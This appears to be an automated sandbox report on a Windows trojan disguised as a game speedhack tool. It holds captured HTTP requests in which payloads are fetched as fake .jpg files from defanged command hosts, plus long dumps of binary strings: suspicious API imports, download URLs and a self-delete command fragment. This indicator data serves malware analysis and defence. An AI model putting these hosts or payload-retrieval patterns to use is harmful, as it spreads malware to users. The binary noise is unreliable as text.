R<%i^...6..:.r.>..O.FS. ..^.....#.O. CA8..C...3S...yf....z..#0..
.g.....E ..G..^)........{..*. l..<.^[.6.5..&.'.j.*z..>Yv[..5....
...d...Tp....i9ra9....... .U/A.REP."w..s....L.;*....M...O.f.1..b." ..I
..B.....knW(.J. .. T.F-.Y.....$-....*.Z...Bp......K...a..Q.lA.....".@Y
I..:RmR ..m.....`.....wF.w.m..;....zn.......5...z...L...y.7..Ko....z..
mP..XoL{G...{/.@..uk...s .^.>..k#......7.R.........<o.b.(V...(..
j1.].0....b..../......d4.V.VC..4..3.R.d.EZ=.A..l......2.....l...;e...[
X...O...Sb..H...9..@<..$,Qp.v...XQRU...9`.@.U.A:..|..DD.....la....b
..AkY^..[.=..3y..B....@.1..r....{..a*..b..>..j..K..........Am.'
<<< skipped >>>

GET /dat/llq.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/llq.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:31 GMT
Content-Type: image/jpeg
Content-Length: 961179
Connection: keep-alive
x-oss-request-id: 599EA59F355BE80F759ED4B8
Accept-Ranges: bytes
ETag: "DBA2D87BC76040E4988E469DD5F22069"
Last-Modified: Mon, 03 Jul 2017 13:36:34 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10843003760265714573
x-oss-storage-class: Standard
Content-MD5: 26LYe8dgQOSYjkad1fIgaQ==
x-oss-server-time: 1
..>...".x...}|T..7~.%..L.....0.....&*4P....qf.........*....\%.$2..K
[D}j.To.[.}.-T....|..[.b[.V7.1.J@...w.sf&.{....}....Q....~Y{...^o{....
B.).b....(k..W......E.z...*..y..5...\P..qo..{...=.~...[....p.m.-.'rW..
w.U.\W.....wBnn..........'^5.M9g..........*.........QN......\.....g.|.
O.O./yu:.. n.r.........s...x.{..p..Wo..G_..~[r.....q.........e.%C.|..7
.i..<K.%SQ:.)J.......(..>Lb...._EI.* &s..x.b......M......W.X...J
..CR.}.(..i........]....*.._O..wQ.~/..0.P....._....p..[..*.=.Zd....i.U
....M){....AuY...|.......z......}..?......}.=..s;.3N.7...[UpF.........
o........o........o.......V.qh3<..{I.TVN..e*..^......9........-..X.
. .sRB|..........wW%>...Z.............z...@P[..jyZ"!l.....k*..k....
.......m..7o.]..%v.=|..u.lOc..S.....Y.U...U....Q.....h..[.w<.Z....;
......9oR..t.C>....U..x........"*...(...._..K.W..6..n..L.[M(.......
.v.F.v.#..3[;}.g..m.....9'........,z&...F/.M|...........Z....w....C./.
.h.;......Kh=.....Nz..a......T.i..qGrNkaO..t|.e...y..........r.k....(w
.vz.a..sJ[.)......_.....$.S..G&>..7..v:..3..4R....q.<.\d".Q... .
l.......H|zn..,.W......m.w.;.s...l.. /.t.C..h#z.N|.DO.l...eZ7.....i.n.
Rf... #G..=..I..K|4,g.....J.G.<x|...9.S^.......,....>O|.....E...
.R*.....T...).2..^V..]...%w.C.&>.".Q_m......q.s>..j...e...x...SG
.......b....G.v.{.;...9.P..... ..?K.........R..d.....=.......K....i...
0..5.....SH%../.~....SHe..zYA(.;l..@......E.W....g......\a;L....<v.
.d.9n...H.:CS'jU...7..w...`..S....A>L..|......K.?,.....m.......qoR.
..6..7.[..8^.^..x.dBd. q.m..............z..c...'........2ym.....r.
<<< skipped >>>

GET /dat/lua.jpg HTTP/1.1


Referer: hXXp://dh-cfg.112zm.com/dat/lua.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:42 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 1532
Connection: keep-alive
x-oss-request-id: 599EA5AA355BE80F759F22B2
Accept-Ranges: bytes
ETag: "74678DA471C0C9612B7AE55348468762"
Last-Modified: Thu, 24 Aug 2017 06:25:31 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10084772291103271800
x-oss-storage-class: Standard
Content-MD5: dGeNpHHAyWEreuVTSEaHYg==
x-oss-server-time: 1
..>.....x............p....K.GQox..JJ.-...-..&....x..^....Y.&m(..]dG
....-.n.......4.l..1z.y.......]/-...$.3..~.-.....Q........A..x...%.l..
.....F..I.......4....2...G..R.z..q..e...........Y...G.T...&#.Q$;......
..x>&...z:..{.0d....*...L....s./Ve..^.SYB...J7...w.)[.<..].{:...
$.2L)..U.&4.k!....Xf..w@P..ADL*.......AM......1..\f......._..Z1.Z.N.|.
...Y.s-.W......e.\..T_.....u[..#_...y.V.D..l..."...@.h.B............&2
......'[...F....3M....T!....F.2M......fhFbL......X....b......s/.T.xr?r
$......I.....Q_.~q!..3."..5.....dT.V....e,4)....[.....o/wu...R...M....
... ...5..K...y.".i.........e....ke.......^.0.........R5c.q...yK..E...
S......%P\.J<..o....u"{.}4...,c............PV...:(qnj^...u..Qq!..?.
..U....4h...;h.];...E.......(N......9...^T.ZG.Q\* .q..|K...A....=..C..
.h..W ...2J.[..g.rT...T...y.!......gM.P.M.KQ...pz-...^.Re....O."Jm..x.
3u..&2.B...........;.......v.....u2...R{#k.{..........T5..k.p..)...G.E
.E?5..%.G...5..K..E4uc...7}..g.....u...w....gw<..S}'w..C0<}>.
.ZZ,4...Js..:d.......|,..].... .>4.....?...%........*6..........M..
T........O.r...z...G....S...bx.e.?...t.....lGU..@c.h].....&...Y....f6.
.......6).....Km...D.........p..Z.$.P.E.E';..D..6.$Bu. <,..CmA..'.`
....i4...z....a.....Y<.4.Afq..K...?...'T.h8.wK..6>.H.....c../u .
..#6..e.#..Kx...8N...J....qqU.....I.W..'......j<.....C...R.PT@.....
o..? ....\...../.\..r.Y).j......Z..)..... .N..@:...G.G.F...m.NB[......
.....=}.!.S#@.W..W...i?.=J]..Z2I..s........3...{....P......_..]...H...
..o.0./<...c."w..u.@...RT7.....r.......5.....7........C;.2!..}C
<<< skipped >>>


GET /dh.jb HTTP/1.1
Referer: hXXp://dh-cfg.liuxue789.cn/dh.jb
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.liuxue789.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:05 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 606
Connection: keep-alive
x-oss-request-id: 599EA585D69B241A3F8993B4
Accept-Ranges: bytes
ETag: "5B2DE100C4A554422C328BE17689F6BD"
Last-Modified: Thu, 24 Aug 2017 06:29:40 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10238493893129602065
x-oss-storage-class: Standard
Content-MD5: Wy3hAMSlVEIsMovhdon2vQ==
x-oss-server-time: 1
..>.R...x...=o.A...H...A....#...^.....Bq./..s...(....F.KB.$...\D.-.
....9.qHaLu3..{.wv........E.......m#f.>.".[ Q4...I7Ak.........R...x
y..Gk......O..V.e9X..Nw-..m.B...i..:I..G..@...`.Y......b.,..Io..,...F.
.N...S....D.w... .7hp....h%..X...9..<0......%K.k......b..2.q...\HCY
p"...]U.............[..K.k..1.....L.C..5.Zx..\....F/(b.V..N.."V\.....K
..Yf..m...N..ogG..l...../.....).C...T..c..X..U."x......L.I..ic....AR.M
a9..Q@5..HK...lP.*B.,....j..a....p> ..,....h!...l.......`..Z..Q'8..
.3ePo...v.....F...<.........L...*.y.Ah .r.....b.w..\.........b.....
.."....Q...V......Q..{..>O&.'.....\<?.>...{.'...O...Y...7....
HTTP/1.1 200 OK..Server: AliyunOSS..Date: Thu, 24 Aug 2017 10:08:05 GM
T..Content-Type: application/x-www-form-urlencoded;charset=utf-8..Cont
ent-Length: 606..Connection: keep-alive..x-oss-request-id: 599EA585D69
B241A3F8993B4..Accept-Ranges: bytes..ETag: "5B2DE100C4A554422C328BE176
89F6BD"..Last-Modified: Thu, 24 Aug 2017 06:29:40 GMT..x-oss-object-ty
pe: Normal..x-oss-hash-crc64ecma: 10238493893129602065..x-oss-storage-
class: Standard..Content-MD5: Wy3hAMSlVEIsMovhdon2vQ==..x-oss-server-t
ime: 1....>.R...x...=o.A...H...A....#...^.....Bq./..s...(....F.KB.$
...\D.-.....9.qHaLu3..{.wv........E.......m#f.>.".[ Q4...I7Ak......
...R...xy..Gk......O..V.e9X..Nw-..m.B...i..:I..G..@...`.Y......b.,..Io
..,...F..N...S....D.w... .7hp....h%..X...9..<0......%K.k......b..2.
q...\HCYp"...]U.............[..K.k..1.....L.C..5.Zx..\....F/(b.V..N.."
V\.....K..Yf..m...N..ogG..l...../.....).C...T..c..X..U."x......L.I
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2972:

`.rsrc
t$(SSh
|$D.tm
~%UVW
u$SShe
Bv=kAv.SCv
kernel32.dll
wininet.dll
user32.dll
advapi32.dll
aa_enginex.dll
shlwapi.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
EnumChildWindows
MapVirtualKeyA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
{B6F7542F-B8FE-46a8-9605-98856A687097}
WebBrowser
\speedhack-i386.dll
.text
`.data
.idata
.edata
@.reloc
t.Ht2Ht6Ht:Ht>
winmm.dll
F&{00000000-0000-0000-C000-000000000046}
3This binary has no widestrings support compiled in.
6This binary has no unicodestrings support compiled in.
ENoThreadSupport
ENoWideStringSupport
=?&{7B108C52-1D8F-4CDB-9CDF-57E071193D3F}$TMultiReadExclusiveWriteSynchronizer
BasicEventWaitFor failed in TMultiReadExclusiveWriteSynchronizer.Beginread
ENoThreadSupportd6
&{3FEEC8E1-E400-4A24-BCAC-1F01476439B1}
&{663C603C-3F3C-4CC5-823C-AC8079F979E5}
&{BC7376EA-199C-4C2A-8684-F4805F0691CA}
.Owner
sysconst.sabstracterror
sysconst.saccessdenied
sysconst.saccessviolation
Missing argument in format "%s"
sysconst.sargumentmissing
%s (%s, line %d)
sysconst.sasserterror
sysconst.sassertionfailed
sysconst.sbuserror
sysconst.scontrolc
sysconst.sdiskfull
sysconst.sdispatcherror
sysconst.sdivbyzero
sysconst.sendoffile
External exception %x
sysconst.sexternalexception
sysconst.sfilenotassigned
sysconst.sfilenotfound
sysconst.sfilenotopen
sysconst.sfilenotopenforinput
sysconst.sfilenotopenforoutput
sysconst.sinvalidfilename
sysconst.sintoverflow
Interface not supported
sysconst.sintfcasterror
Invalid argument index in format "%s"
sysconst.sinvalidargindex
sysconst.sinvalidcast
sysconst.sinvaliddrive
sysconst.sinvalidfilehandle
Invalid format specifier : "%s"
sysconst.sinvalidformat
sysconst.sinvalidinput
Invalid floating point operation
sysconst.sinvalidop
Invalid pointer operation
sysconst.sinvalidpointer
sysconst.sinvalidvarcast
Invalid variant operation
sysconst.sinvalidvarop
Threads not supported. Recompile program with thread driver.
sysconst.snothreadsupport
sysconst.smissingwstringmanager
sysconst.ssigquit
System error, (OS Code %d):
sysconst.soserror
sysconst.soutofmemory
sysconst.soverflow
sysconst.sprivilege
sysconst.srangeerror
sysconst.ssafecallexception
sysconst.siconverror
sysconst.stoomanyopenfiles
sysconst.sunknownruntimeerror
sysconst.sunderflow
An operating system call failed.
sysconst.sunkoserror
sysconst.svararraybounds
sysconst.svararraycreate
sysconst.svarnotarray
Ancestor class for "%s" not found.
rtlconsts.sancestornotfound
Cannot assign a %s to a %s.
rtlconsts.sassignerror
Class "%s" not found
rtlconsts.sclassnotfound
Duplicate name: A component named "%s" already exists
rtlconsts.sduplicatename
rtlconsts.sduplicatestring
rtlconsts.semptystreamillegalreader
rtlconsts.semptystreamillegalwriter
No variant support for properties. Please use the variants unit in your project and recompile
rtlconsts.serrnovariantsupport
"%s" is not an observer
rtlconsts.serrnotobserver
Unable to create file "%s"
rtlconsts.sfcreateerror
Unable to open file "%s"
rtlconsts.sfopenerror
rtlconsts.sinvalidimage
"%s" is not a valid component name
rtlconsts.sinvalidname
rtlconsts.sinvalidpropertypath
rtlconsts.sinvalidpropertyvalue
List capacity (%d) exceeded.
rtlconsts.slistcapacityerror
List count (%d) out of bounds.
rtlconsts.slistcounterror
List index (%d) out of bounds
rtlconsts.slistindexerror
rtlconsts.smemorystreamerror
Error reading %s%s%s: %s
rtlconsts.spropertyexception
rtlconsts.sreaderror
rtlconsts.sreadonlyproperty
Resource "%s" not found
rtlconsts.sresnotfound
%s.Seek not implemented
rtlconsts.sseeknotimplemented
Operation not allowed on sorted list
rtlconsts.ssortedlisterror
Invalid stream operation %s.Seek
rtlconsts.sstreaminvalidseek
Reading from %s is not supported
rtlconsts.sstreamnoreading
Writing to %s is not supported
rtlconsts.sstreamnowriting
Unknown property: "%s"
rtlconsts.sunknownproperty
Unknown property type %d
rtlconsts.sunknownpropertytype
Unsupported property variant type %d
rtlconsts.sunsupportedpropertyvarianttype
rtlconsts.swriteerror
FPC 2.6.2 [2013/03/17] for i386 - Win32
GetConsoleOutputCP
GetProcessHeap
GetWindowsDirectoryA
oleaut32.dll
SPEEDHACK.dll
7 8%8:8\8
? ?$?(?0?4?8?
%hXXp://VVV.globalsign.net/repository/03
"hXXp://crl.globalsign.net/root.crl0
&hXXps://VVV.globalsign.com/repository/03
 hXXp://crl.globalsign.net/Timestamping1.crl0
%hXXp://VVV.globalsign.net/repository/0
dark_byte@hotmail.com0
&hXXps://VVV.globalsign.com/repository/0
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt04
(hXXp://ocsp2.globalsign.com/gscodesigng20
hXXps://jq.qq.com/?_wv=1027&k=4BdffAb
hXXp://VVV.kelepan.com/space_fenghuo_4825.html
hXXp://pan.baidu.com/s/1bn3YBGN
1000086
hXXps://pan.lanzou.com/1367015
hXXp://dh-cfg.liuxue789.cn/dh.jb
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
.rsrc
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
.rdata
.data
.reloc
.aspack
.adata
.Ek!sv&
00000000000000000
00000000
FPU registers have indexes 0 to 7
Too long import name
Unterminated import name
Sorry, 16-bit addressing is not supported
Unrecognized operand
REP %s
REPE %s
REPNE %s
Extra input after operand
Too few operands
Too many operands
Command does not support given operands
Wrong number of operands
Please specify operand size
Bad operand size
Different size of operands
Constant does not fit into operand
Relative jump out of range, use %s LONG form
LOCK CMPXCHG8B may crash some processors when executed
Win95/98 may crash when VxD call is executed in user mode
Win95/98 may crash when NOT ESP is executed
Win95/98 may crash when NEG ESP is executed
d:\AA
)\AA Engine 1.21\Release\aa_engine.pdb
KERNEL32.dll
ADVAPI32.dll
MSVCP90.dll
dbghelp.dll
MSVCR90.dll
_malloc_crt
_amsg_exit
_crt_debugger_hook
aa_engine.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
msvcp90.dll
msvcr90.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
hXXp://abcdfdfd.oss-cn-shanghai.aliyuncs.com/xy.txt
hXXp://pan.lanzou.com/p/561515405
cmd /c ping 1.1.1.1 -n 1 -w
SeeYouAgain.mp3
hXXp://music.163.com/outchain/player?type=2&id=33937655&auto=1&height=66
RightHereWaiting.mp3
hXXp://music.163.com/outchain/player?type=2&id=3313653&auto=1&height=66
IAmYou.mp3
hXXp://music.163.com/outchain/player?type=2&id=2919622&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=27808044&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=41665696&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=27955653&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=410042104&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=436514312&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=439915614&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=31445772&auto=1&height=66
WeDon'tTalkAnymore.mp3
hXXp://music.163.com/outchain/player?type=2&id=409654891&auto=1&height=66
p_sshh
hXXp://VVV.520cxzm.com/xy.html#
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
VBScript.RegExp
Microsoft.XMLDOM
:hXXp://rj.baidu.com/soft/detail/17153.html?ald,
R].Vk
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.18
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
F%D,3
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
(*.htm;*.html)|*.htm;*.html
VVV.dywt.com.cn
index.dat
desktop.ini
:%d) |
%I64d%s
:0{}%s
:%d)%s
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
(*.avi)|*.avi
RICHED32.DLL
RICHED20.DLL
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
%d%d%d
rundll32.exe shell32.dll,
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
GetViewportOrgEx
SetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
OffsetViewportOrgEx
ShellExecuteA
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
UnregisterHotKey
RegisterHotKey
GetKeyState
InternetCanonicalizeUrlA
InternetCrackUrlA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
`.rdata
@.data
OJ.Wr
ug?Key
UrlA3
AVIFIL32.dll
comdlg32.dll
OLEAUT32.dll
oledlg.dll
RASAPI32.dll
SHELL32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
hXXp://VVV.kelepan.com/space_mieshi_5865.html
hXXp://pan.baidu.com/s/1i3n8qn7
1, 0, 6, 6
- Skin.dll
1.0.0.0

%original file name%.exe_2972_rwx_00401000_00241000:

t$(SSh
|$D.tm
~%UVW
u$SShe
Bv=kAv.SCv
kernel32.dll
wininet.dll
user32.dll
advapi32.dll
aa_enginex.dll
shlwapi.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
EnumChildWindows
MapVirtualKeyA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
{B6F7542F-B8FE-46a8-9605-98856A687097}
WebBrowser
\speedhack-i386.dll
.text
`.data
.idata
.edata
@.reloc
t.Ht2Ht6Ht:Ht>
winmm.dll
F&{00000000-0000-0000-C000-000000000046}
3This binary has no widestrings support compiled in.
6This binary has no unicodestrings support compiled in.
ENoThreadSupport
ENoWideStringSupport
=?&{7B108C52-1D8F-4CDB-9CDF-57E071193D3F}$TMultiReadExclusiveWriteSynchronizer
BasicEventWaitFor failed in TMultiReadExclusiveWriteSynchronizer.Beginread
ENoThreadSupportd6
&{3FEEC8E1-E400-4A24-BCAC-1F01476439B1}
&{663C603C-3F3C-4CC5-823C-AC8079F979E5}
&{BC7376EA-199C-4C2A-8684-F4805F0691CA}
.Owner
sysconst.sabstracterror
sysconst.saccessdenied
sysconst.saccessviolation
Missing argument in format "%s"
sysconst.sargumentmissing
%s (%s, line %d)
sysconst.sasserterror
sysconst.sassertionfailed
sysconst.sbuserror
sysconst.scontrolc
sysconst.sdiskfull
sysconst.sdispatcherror
sysconst.sdivbyzero
sysconst.sendoffile
External exception %x
sysconst.sexternalexception
sysconst.sfilenotassigned
sysconst.sfilenotfound
sysconst.sfilenotopen
sysconst.sfilenotopenforinput
sysconst.sfilenotopenforoutput
sysconst.sinvalidfilename
sysconst.sintoverflow
Interface not supported
sysconst.sintfcasterror
Invalid argument index in format "%s"
sysconst.sinvalidargindex
sysconst.sinvalidcast
sysconst.sinvaliddrive
sysconst.sinvalidfilehandle
Invalid format specifier : "%s"
sysconst.sinvalidformat
sysconst.sinvalidinput
Invalid floating point operation
sysconst.sinvalidop
Invalid pointer operation
sysconst.sinvalidpointer
sysconst.sinvalidvarcast
Invalid variant operation
sysconst.sinvalidvarop
Threads not supported. Recompile program with thread driver.
sysconst.snothreadsupport
sysconst.smissingwstringmanager
sysconst.ssigquit
System error, (OS Code %d):
sysconst.soserror
sysconst.soutofmemory
sysconst.soverflow
sysconst.sprivilege
sysconst.srangeerror
sysconst.ssafecallexception
sysconst.siconverror
sysconst.stoomanyopenfiles
sysconst.sunknownruntimeerror
sysconst.sunderflow
An operating system call failed.
sysconst.sunkoserror
sysconst.svararraybounds
sysconst.svararraycreate
sysconst.svarnotarray
Ancestor class for "%s" not found.
rtlconsts.sancestornotfound
Cannot assign a %s to a %s.
rtlconsts.sassignerror
Class "%s" not found
rtlconsts.sclassnotfound
Duplicate name: A component named "%s" already exists
rtlconsts.sduplicatename
rtlconsts.sduplicatestring
rtlconsts.semptystreamillegalreader
rtlconsts.semptystreamillegalwriter
No variant support for properties. Please use the variants unit in your project and recompile
rtlconsts.serrnovariantsupport
"%s" is not an observer
rtlconsts.serrnotobserver
Unable to create file "%s"
rtlconsts.sfcreateerror
Unable to open file "%s"
rtlconsts.sfopenerror
rtlconsts.sinvalidimage
"%s" is not a valid component name
rtlconsts.sinvalidname
rtlconsts.sinvalidpropertypath
rtlconsts.sinvalidpropertyvalue
List capacity (%d) exceeded.
rtlconsts.slistcapacityerror
List count (%d) out of bounds.
rtlconsts.slistcounterror
List index (%d) out of bounds
rtlconsts.slistindexerror
rtlconsts.smemorystreamerror
Error reading %s%s%s: %s
rtlconsts.spropertyexception
rtlconsts.sreaderror
rtlconsts.sreadonlyproperty
Resource "%s" not found
rtlconsts.sresnotfound
%s.Seek not implemented
rtlconsts.sseeknotimplemented
Operation not allowed on sorted list
rtlconsts.ssortedlisterror
Invalid stream operation %s.Seek
rtlconsts.sstreaminvalidseek
Reading from %s is not supported
rtlconsts.sstreamnoreading
Writing to %s is not supported
rtlconsts.sstreamnowriting
Unknown property: "%s"
rtlconsts.sunknownproperty
Unknown property type %d
rtlconsts.sunknownpropertytype
Unsupported property variant type %d
rtlconsts.sunsupportedpropertyvarianttype
rtlconsts.swriteerror
FPC 2.6.2 [2013/03/17] for i386 - Win32
GetConsoleOutputCP
GetProcessHeap
GetWindowsDirectoryA
oleaut32.dll
SPEEDHACK.dll
7 8%8:8\8
? ?$?(?0?4?8?
%hXXp://VVV.globalsign.net/repository/03
"hXXp://crl.globalsign.net/root.crl0
&hXXps://VVV.globalsign.com/repository/03
 hXXp://crl.globalsign.net/Timestamping1.crl0
%hXXp://VVV.globalsign.net/repository/0
dark_byte@hotmail.com0
&hXXps://VVV.globalsign.com/repository/0
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt04
(hXXp://ocsp2.globalsign.com/gscodesigng20
hXXps://jq.qq.com/?_wv=1027&k=4BdffAb
hXXp://VVV.kelepan.com/space_fenghuo_4825.html
hXXp://pan.baidu.com/s/1bn3YBGN
1000086
hXXps://pan.lanzou.com/1367015
hXXp://dh-cfg.liuxue789.cn/dh.jb
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
.rsrc
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
.rdata
.data
.reloc
.aspack
.adata
.Ek!sv&
00000000000000000
00000000
FPU registers have indexes 0 to 7
Too long import name
Unterminated import name
Sorry, 16-bit addressing is not supported
Unrecognized operand
REP %s
REPE %s
REPNE %s
Extra input after operand
Too few operands
Too many operands
Command does not support given operands
Wrong number of operands
Please specify operand size
Bad operand size
Different size of operands
Constant does not fit into operand
Relative jump out of range, use %s LONG form
LOCK CMPXCHG8B may crash some processors when executed
Win95/98 may crash when VxD call is executed in user mode
Win95/98 may crash when NOT ESP is executed
Win95/98 may crash when NEG ESP is executed
d:\AA
)\AA Engine 1.21\Release\aa_engine.pdb
KERNEL32.dll
ADVAPI32.dll
MSVCP90.dll
dbghelp.dll
MSVCR90.dll
_malloc_crt
_amsg_exit
_crt_debugger_hook
aa_engine.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
msvcp90.dll
msvcr90.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
